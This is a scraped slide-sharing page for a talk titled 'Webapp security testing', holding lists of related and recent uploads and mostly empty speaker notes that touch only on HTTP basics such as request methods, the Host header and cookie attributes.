A Forgotten HTTP Invisibility CloakA Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility Cloak
 
XFLTReat: a new dimension in tunnelling
XFLTReat:  a new dimension in tunnellingXFLTReat:  a new dimension in tunnelling
XFLTReat: a new dimension in tunnelling
 
XFLTReaT: A New Dimension in Tunneling (Shakacon 2017)
XFLTReaT: A New Dimension in Tunneling (Shakacon 2017)XFLTReaT: A New Dimension in Tunneling (Shakacon 2017)
XFLTReaT: A New Dimension in Tunneling (Shakacon 2017)
 
INTRODUCTION to php.pptx
INTRODUCTION to php.pptxINTRODUCTION to php.pptx
INTRODUCTION to php.pptx
 
HTML5
HTML5 HTML5
HTML5
 
Web Services PHP Tutorial
Web Services PHP TutorialWeb Services PHP Tutorial
Web Services PHP Tutorial
 

More from Tomas Doran

Empowering developers to deploy their own data stores
Empowering developers to deploy their own data storesEmpowering developers to deploy their own data stores
Empowering developers to deploy their own data storesTomas Doran
 
Dockersh and a brief intro to the docker internals
Dockersh and a brief intro to the docker internalsDockersh and a brief intro to the docker internals
Dockersh and a brief intro to the docker internalsTomas Doran
 
Sensu and Sensibility - Puppetconf 2014
Sensu and Sensibility - Puppetconf 2014Sensu and Sensibility - Puppetconf 2014
Sensu and Sensibility - Puppetconf 2014Tomas Doran
 
Steamlining your puppet development workflow
Steamlining your puppet development workflowSteamlining your puppet development workflow
Steamlining your puppet development workflowTomas Doran
 
Building a smarter application stack - service discovery and wiring for Docker
Building a smarter application stack - service discovery and wiring for DockerBuilding a smarter application stack - service discovery and wiring for Docker
Building a smarter application stack - service discovery and wiring for DockerTomas Doran
 
Chasing AMI - Building Amazon machine images with Puppet, Packer and Jenkins
Chasing AMI - Building Amazon machine images with Puppet, Packer and JenkinsChasing AMI - Building Amazon machine images with Puppet, Packer and Jenkins
Chasing AMI - Building Amazon machine images with Puppet, Packer and JenkinsTomas Doran
 
Deploying puppet code at light speed
Deploying puppet code at light speedDeploying puppet code at light speed
Deploying puppet code at light speedTomas Doran
 
Thinking through puppet code layout
Thinking through puppet code layoutThinking through puppet code layout
Thinking through puppet code layoutTomas Doran
 
Docker puppetcamp london 2013
Docker puppetcamp london 2013Docker puppetcamp london 2013
Docker puppetcamp london 2013Tomas Doran
 
"The worst code I ever wrote"
"The worst code I ever wrote""The worst code I ever wrote"
"The worst code I ever wrote"Tomas Doran
 
Test driven infrastructure development (2 - puppetconf 2013 edition)
Test driven infrastructure development (2 - puppetconf 2013 edition)Test driven infrastructure development (2 - puppetconf 2013 edition)
Test driven infrastructure development (2 - puppetconf 2013 edition)Tomas Doran
 
Test driven infrastructure development
Test driven infrastructure developmentTest driven infrastructure development
Test driven infrastructure developmentTomas Doran
 
London devops - orc
London devops - orcLondon devops - orc
London devops - orcTomas Doran
 
London devops logging
London devops loggingLondon devops logging
London devops loggingTomas Doran
 
Message:Passing - lpw 2012
Message:Passing - lpw 2012Message:Passing - lpw 2012
Message:Passing - lpw 2012Tomas Doran
 
Webapp security testing
Webapp security testingWebapp security testing
Webapp security testingTomas Doran
 
Dates aghhhh!!?!?!?!
Dates aghhhh!!?!?!?!Dates aghhhh!!?!?!?!
Dates aghhhh!!?!?!?!Tomas Doran
 
Messaging, interoperability and log aggregation - a new framework
Messaging, interoperability and log aggregation - a new frameworkMessaging, interoperability and log aggregation - a new framework
Messaging, interoperability and log aggregation - a new frameworkTomas Doran
 
Cooking a rabbit pie
Cooking a rabbit pieCooking a rabbit pie
Cooking a rabbit pieTomas Doran
 

More from Tomas Doran (20)

Empowering developers to deploy their own data stores
Empowering developers to deploy their own data storesEmpowering developers to deploy their own data stores
Empowering developers to deploy their own data stores
 
Dockersh and a brief intro to the docker internals
Dockersh and a brief intro to the docker internalsDockersh and a brief intro to the docker internals
Dockersh and a brief intro to the docker internals
 
Sensu and Sensibility - Puppetconf 2014
Sensu and Sensibility - Puppetconf 2014Sensu and Sensibility - Puppetconf 2014
Sensu and Sensibility - Puppetconf 2014
 
Steamlining your puppet development workflow
Steamlining your puppet development workflowSteamlining your puppet development workflow
Steamlining your puppet development workflow
 
Building a smarter application stack - service discovery and wiring for Docker
Building a smarter application stack - service discovery and wiring for DockerBuilding a smarter application stack - service discovery and wiring for Docker
Building a smarter application stack - service discovery and wiring for Docker
 
Chasing AMI - Building Amazon machine images with Puppet, Packer and Jenkins
Chasing AMI - Building Amazon machine images with Puppet, Packer and JenkinsChasing AMI - Building Amazon machine images with Puppet, Packer and Jenkins
Chasing AMI - Building Amazon machine images with Puppet, Packer and Jenkins
 
Deploying puppet code at light speed
Deploying puppet code at light speedDeploying puppet code at light speed
Deploying puppet code at light speed
 
Thinking through puppet code layout
Thinking through puppet code layoutThinking through puppet code layout
Thinking through puppet code layout
 
Docker puppetcamp london 2013
Docker puppetcamp london 2013Docker puppetcamp london 2013
Docker puppetcamp london 2013
 
"The worst code I ever wrote"
"The worst code I ever wrote""The worst code I ever wrote"
"The worst code I ever wrote"
 
Test driven infrastructure development (2 - puppetconf 2013 edition)
Test driven infrastructure development (2 - puppetconf 2013 edition)Test driven infrastructure development (2 - puppetconf 2013 edition)
Test driven infrastructure development (2 - puppetconf 2013 edition)
 
Test driven infrastructure development
Test driven infrastructure developmentTest driven infrastructure development
Test driven infrastructure development
 
London devops - orc
London devops - orcLondon devops - orc
London devops - orc
 
London devops logging
London devops loggingLondon devops logging
London devops logging
 
Message:Passing - lpw 2012
Message:Passing - lpw 2012Message:Passing - lpw 2012
Message:Passing - lpw 2012
 
Webapp security testing
Webapp security testingWebapp security testing
Webapp security testing
 
Dates aghhhh!!?!?!?!
Dates aghhhh!!?!?!?!Dates aghhhh!!?!?!?!
Dates aghhhh!!?!?!?!
 
Messaging, interoperability and log aggregation - a new framework
Messaging, interoperability and log aggregation - a new frameworkMessaging, interoperability and log aggregation - a new framework
Messaging, interoperability and log aggregation - a new framework
 
Zero mq logs
Zero mq logsZero mq logs
Zero mq logs
 
Cooking a rabbit pie
Cooking a rabbit pieCooking a rabbit pie
Cooking a rabbit pie
 

Recently uploaded

Nanopower In Semiconductor Industry.pdf
Nanopower  In Semiconductor Industry.pdfNanopower  In Semiconductor Industry.pdf
Nanopower In Semiconductor Industry.pdfPedro Manuel
 
COMPUTER 10 Lesson 8 - Building a Website
COMPUTER 10 Lesson 8 - Building a WebsiteCOMPUTER 10 Lesson 8 - Building a Website
COMPUTER 10 Lesson 8 - Building a Websitedgelyza
 
RAG Patterns and Vector Search in Generative AI
RAG Patterns and Vector Search in Generative AIRAG Patterns and Vector Search in Generative AI
RAG Patterns and Vector Search in Generative AIUdaiappa Ramachandran
 
IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019
IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019
IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019IES VE
 
Meet the new FSP 3000 M-Flex800™
Meet the new FSP 3000 M-Flex800™Meet the new FSP 3000 M-Flex800™
Meet the new FSP 3000 M-Flex800™Adtran
 
9 Steps For Building Winning Founding Team
9 Steps For Building Winning Founding Team9 Steps For Building Winning Founding Team
9 Steps For Building Winning Founding TeamAdam Moalla
 
Basic Building Blocks of Internet of Things.
Basic Building Blocks of Internet of Things.Basic Building Blocks of Internet of Things.
Basic Building Blocks of Internet of Things.YounusS2
 
Computer 10: Lesson 10 - Online Crimes and Hazards
Computer 10: Lesson 10 - Online Crimes and HazardsComputer 10: Lesson 10 - Online Crimes and Hazards
Computer 10: Lesson 10 - Online Crimes and HazardsSeth Reyes
 
Introduction to Quantum Computing
Introduction to Quantum ComputingIntroduction to Quantum Computing
Introduction to Quantum ComputingGDSC PJATK
 
20200723_insight_release_plan_v6.pdf20200723_insight_release_plan_v6.pdf
20200723_insight_release_plan_v6.pdf20200723_insight_release_plan_v6.pdf20200723_insight_release_plan_v6.pdf20200723_insight_release_plan_v6.pdf
20200723_insight_release_plan_v6.pdf20200723_insight_release_plan_v6.pdfJamie (Taka) Wang
 
UiPath Community: AI for UiPath Automation Developers
UiPath Community: AI for UiPath Automation DevelopersUiPath Community: AI for UiPath Automation Developers
UiPath Community: AI for UiPath Automation DevelopersUiPathCommunity
 
OpenShift Commons Paris - Choose Your Own Observability Adventure
OpenShift Commons Paris - Choose Your Own Observability AdventureOpenShift Commons Paris - Choose Your Own Observability Adventure
OpenShift Commons Paris - Choose Your Own Observability AdventureEric D. Schabell
 
Do we need a new standard for visualizing the invisible?
Do we need a new standard for visualizing the invisible?Do we need a new standard for visualizing the invisible?
Do we need a new standard for visualizing the invisible?SANGHEE SHIN
 
Connector Corner: Extending LLM automation use cases with UiPath GenAI connec...
Connector Corner: Extending LLM automation use cases with UiPath GenAI connec...Connector Corner: Extending LLM automation use cases with UiPath GenAI connec...
Connector Corner: Extending LLM automation use cases with UiPath GenAI connec...DianaGray10
 
Comparing Sidecar-less Service Mesh from Cilium and Istio
Comparing Sidecar-less Service Mesh from Cilium and IstioComparing Sidecar-less Service Mesh from Cilium and Istio
Comparing Sidecar-less Service Mesh from Cilium and IstioChristian Posta
 
COMPUTER 10: Lesson 7 - File Storage and Online Collaboration
COMPUTER 10: Lesson 7 - File Storage and Online CollaborationCOMPUTER 10: Lesson 7 - File Storage and Online Collaboration
COMPUTER 10: Lesson 7 - File Storage and Online Collaborationbruanjhuli
 
AI Fame Rush Review – Virtual Influencer Creation In Just Minutes
AI Fame Rush Review – Virtual Influencer Creation In Just MinutesAI Fame Rush Review – Virtual Influencer Creation In Just Minutes
AI Fame Rush Review – Virtual Influencer Creation In Just MinutesMd Hossain Ali
 
Videogame localization & technology_ how to enhance the power of translation.pdf
Videogame localization & technology_ how to enhance the power of translation.pdfVideogame localization & technology_ how to enhance the power of translation.pdf
Videogame localization & technology_ how to enhance the power of translation.pdfinfogdgmi
 
Empowering Africa's Next Generation: The AI Leadership Blueprint
Empowering Africa's Next Generation: The AI Leadership BlueprintEmpowering Africa's Next Generation: The AI Leadership Blueprint
Empowering Africa's Next Generation: The AI Leadership BlueprintMahmoud Rabie
 
Salesforce Miami User Group Event - 1st Quarter 2024
Salesforce Miami User Group Event - 1st Quarter 2024Salesforce Miami User Group Event - 1st Quarter 2024
Salesforce Miami User Group Event - 1st Quarter 2024SkyPlanner
 

Recently uploaded (20)

Nanopower In Semiconductor Industry.pdf
Nanopower  In Semiconductor Industry.pdfNanopower  In Semiconductor Industry.pdf
Nanopower In Semiconductor Industry.pdf
 
COMPUTER 10 Lesson 8 - Building a Website
COMPUTER 10 Lesson 8 - Building a WebsiteCOMPUTER 10 Lesson 8 - Building a Website
COMPUTER 10 Lesson 8 - Building a Website
 
RAG Patterns and Vector Search in Generative AI
RAG Patterns and Vector Search in Generative AIRAG Patterns and Vector Search in Generative AI
RAG Patterns and Vector Search in Generative AI
 
IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019
IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019
IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019
 
Meet the new FSP 3000 M-Flex800™
Meet the new FSP 3000 M-Flex800™Meet the new FSP 3000 M-Flex800™
Meet the new FSP 3000 M-Flex800™
 
9 Steps For Building Winning Founding Team
9 Steps For Building Winning Founding Team9 Steps For Building Winning Founding Team
9 Steps For Building Winning Founding Team
 
Basic Building Blocks of Internet of Things.
Basic Building Blocks of Internet of Things.Basic Building Blocks of Internet of Things.
Basic Building Blocks of Internet of Things.
 
Computer 10: Lesson 10 - Online Crimes and Hazards
Computer 10: Lesson 10 - Online Crimes and HazardsComputer 10: Lesson 10 - Online Crimes and Hazards
Computer 10: Lesson 10 - Online Crimes and Hazards
 
Introduction to Quantum Computing
Introduction to Quantum ComputingIntroduction to Quantum Computing
Introduction to Quantum Computing
 
20200723_insight_release_plan_v6.pdf20200723_insight_release_plan_v6.pdf
20200723_insight_release_plan_v6.pdf20200723_insight_release_plan_v6.pdf20200723_insight_release_plan_v6.pdf20200723_insight_release_plan_v6.pdf
20200723_insight_release_plan_v6.pdf20200723_insight_release_plan_v6.pdf
 
UiPath Community: AI for UiPath Automation Developers
UiPath Community: AI for UiPath Automation DevelopersUiPath Community: AI for UiPath Automation Developers
UiPath Community: AI for UiPath Automation Developers
 
OpenShift Commons Paris - Choose Your Own Observability Adventure
OpenShift Commons Paris - Choose Your Own Observability AdventureOpenShift Commons Paris - Choose Your Own Observability Adventure
OpenShift Commons Paris - Choose Your Own Observability Adventure
 
Do we need a new standard for visualizing the invisible?
Do we need a new standard for visualizing the invisible?Do we need a new standard for visualizing the invisible?
Do we need a new standard for visualizing the invisible?
 
Connector Corner: Extending LLM automation use cases with UiPath GenAI connec...
Connector Corner: Extending LLM automation use cases with UiPath GenAI connec...Connector Corner: Extending LLM automation use cases with UiPath GenAI connec...
Connector Corner: Extending LLM automation use cases with UiPath GenAI connec...
 
Comparing Sidecar-less Service Mesh from Cilium and Istio
Comparing Sidecar-less Service Mesh from Cilium and IstioComparing Sidecar-less Service Mesh from Cilium and Istio
Comparing Sidecar-less Service Mesh from Cilium and Istio
 
COMPUTER 10: Lesson 7 - File Storage and Online Collaboration
COMPUTER 10: Lesson 7 - File Storage and Online CollaborationCOMPUTER 10: Lesson 7 - File Storage and Online Collaboration
COMPUTER 10: Lesson 7 - File Storage and Online Collaboration
 
AI Fame Rush Review – Virtual Influencer Creation In Just Minutes
AI Fame Rush Review – Virtual Influencer Creation In Just MinutesAI Fame Rush Review – Virtual Influencer Creation In Just Minutes
AI Fame Rush Review – Virtual Influencer Creation In Just Minutes
 
Videogame localization & technology_ how to enhance the power of translation.pdf
Videogame localization & technology_ how to enhance the power of translation.pdfVideogame localization & technology_ how to enhance the power of translation.pdf
Videogame localization & technology_ how to enhance the power of translation.pdf
 
Empowering Africa's Next Generation: The AI Leadership Blueprint
Empowering Africa's Next Generation: The AI Leadership BlueprintEmpowering Africa's Next Generation: The AI Leadership Blueprint
Empowering Africa's Next Generation: The AI Leadership Blueprint
 
Salesforce Miami User Group Event - 1st Quarter 2024
Salesforce Miami User Group Event - 1st Quarter 2024Salesforce Miami User Group Event - 1st Quarter 2024
Salesforce Miami User Group Event - 1st Quarter 2024
 

Webapp security testing

Editor's Notes

  1. \n
  2. \n
  3. \n
  4. \n
  5. \n
  6. \n
  7. \n
  8. \n
  9. \n
  10. \n
  11. \n
  12. \n
  13. \n
  14. \n
  15. \n
  16. \n
  17. \n
  18. \n
  19. \n
  20. TCP (Reliable, ordered). Host, port number.\nRequest and response. GET/HEAD/POST\nHeaders\n
  21. TCP (Reliable, ordered). Host, port number.\nRequest and response. GET/HEAD/POST\nHeaders\n
  22. TCP (Reliable, ordered). Host, port number.\nRequest and response. GET/HEAD/POST\nHeaders\n
  23. TCP (Reliable, ordered). Host, port number.\nRequest and response. GET/HEAD/POST\nHeaders\n
  24. TCP (Reliable, ordered). Host, port number.\nRequest and response. GET/HEAD/POST\nHeaders\n
  25. TCP (Reliable, ordered). Host, port number.\nRequest and response. GET/HEAD/POST\nHeaders\n
  26. \n
  27. \n
  28. \n
  29. \n
  30. \n
  31. \n
  32. \n
  33. \n
  34. \n
  35. \n
  36. \n
  37. \n
  38. \n
  39. \n
  40. \n
  41. \n
  42. \n
  43. \n
  44. \n
  45. \n
  46. \n
  47. \n
  48. \n
  49. \n
  50. \n
  51. \n
  52. \n
  53. Add a mandatory &amp;#x2018;Host&amp;#x2019; header\nWe have run out of IP addresses - this means you can have multiple sites per IP\n
  54. \n
  55. \n
  56. \n
  57. \n
  58. \n
  59. \n
  60. \n
  61. \n
  62. \n
  63. \n
  64. \n
  65. \n
  66. \n
  67. \n
  68. \n
  69. \n
  70. \n
  71. \n
  72. \n
  73. \n
  74. \n
  75. \n
  76. \n
  77. \n
  78. \n
  79. \n
  80. \n
  81. \n
  82. \n
  83. \n
  84. \n
  85. \n
  86. \n
  87. \n
  88. Set-Cookie\nCookie\nDomain / Path / Secure\n
  89. Set-Cookie\nCookie\nDomain / Path / Secure\n
  90. Set-Cookie\nCookie\nDomain / Path / Secure\n
  91. Set-Cookie\nCookie\nDomain / Path / Secure\n
  92. Set-Cookie\nCookie\nDomain / Path / Secure\n
  93. Set-Cookie\nCookie\nDomain / Path / Secure\n
  94. Set-Cookie\nCookie\nDomain / Path / Secure\n
  95. \n
  96. \n
  97. \n
  98. \n
  99. \n
  100. \n
  101. \n
  102. \n
  103. \n
  104. \n
  105. \n
  106. \n
  107. \n
  108. \n
  109. \n
  110. \n
  111. \n
  112. \n
  113. \n
  114. \n
  115. \n
  116. \n
  117. \n
  118. \n
  119. \n
  120. \n
  121. \n
  122. \n
  123. \n
  124. \n
  125. \n
  126. \n
  127. \n
  128. \n
  129. \n
  130. \n
  131. \n
  132. \n
  133. \n
  134. \n
  135. \n
  136. \n
  137. \n
  138. \n
  139. \n
  140. \n
  141. \n
  142. \n
  143. \n
  144. \n
  145. \n
  146. \n
  147. \n
  148. \n
  149. \n
  150. \n